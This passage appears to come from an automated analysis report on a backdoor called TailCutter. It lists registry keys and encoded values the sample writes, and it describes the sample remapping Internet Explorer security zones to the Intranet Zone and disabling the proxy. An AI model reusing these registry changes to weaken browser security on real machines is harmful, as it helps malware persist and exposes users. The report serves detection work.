"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"340d3099" = "/P////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"uuid" = "12802899647634509424"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"27ddcf6f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"48bd1aff" = "V/////%%"
"3c09c42b" = "///%"
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"usr.0" = "oMUlaLmjlhabcdefAB"
"usr.1" = "6t1JF1FHwysurpnikg"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f0bf0bde" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"414bc593" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"LRTS" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"65114b36" = "Vl/l////"
"c6c5dd44" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"48bd1aff" = "V/////%%"
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"27ddcf6f" = "///%"
"72758a5d" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"d1abcdb6" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c5705860" = "Vx////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a0743acc" = "N/////%%"
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
"iiid" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB D9 BC F2 72 8D E9 64 75 E5 45 0A 51 D4 15 46"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svn" = "TailCutter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svi" = "0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"0c230bcb" = "///%"
"587b5709" = "V/////%%"
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"dlpath" = "c:\progra~1\tailcu~1\tailcu~1.dll"
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1520c6f1" = "V/////%%"
"0c230bcb" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c6c5dd44" = "V/////%%"
"e46c271e" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"date" = "1431212812"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"3efeb33e" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"fe94ce1e" = "V/////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"2e22d94e" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"usr.1" = "6t1JF1FHwysurpnikg"
"usr.0" = "oMUlaLmjlhabcdefAB"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"8b9e4cbc" = "V/////%%"
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
"a1dcff5b" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"c6d15ff2" = "%Program Files%\TailCutter\TailCutter.dll"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"414bc593" = "///%"
"f1f24e29" = "Vl/l/C/////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"date" = "1431212812"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"uuid" = "12802899647634509424"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"a2e3b941" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"LRTS" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Install_Dir" = "%Program Files%\TailCutter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svn" = "TailCutter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svi" = "0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"1520c6f1" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svt" = "1431212851"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"InstallDate" = "20140510"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svpath" = "c:\Program Files\TailCutter\TailCutter.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svx" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"uuid" = "12802899647634509424"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"CategoryName" = "%SearchDefenderUpdaterKeys_CategoryName%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"Mode" = "4026531840"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Version" = "22022131"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0c230bcb" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"usr.0" = "oMUlaLmjlhabcdefAB"
"usr.1" = "6t1JF1FHwysurpnikg"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"date" = "1431212812"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d1abcdb6" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"340d3099" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"7367429f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svt" = "1431212851"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"414bc593" = "///%"
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"LRTS" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"Version" = "22022131"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"fe94ce1e" = "V/////%%"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

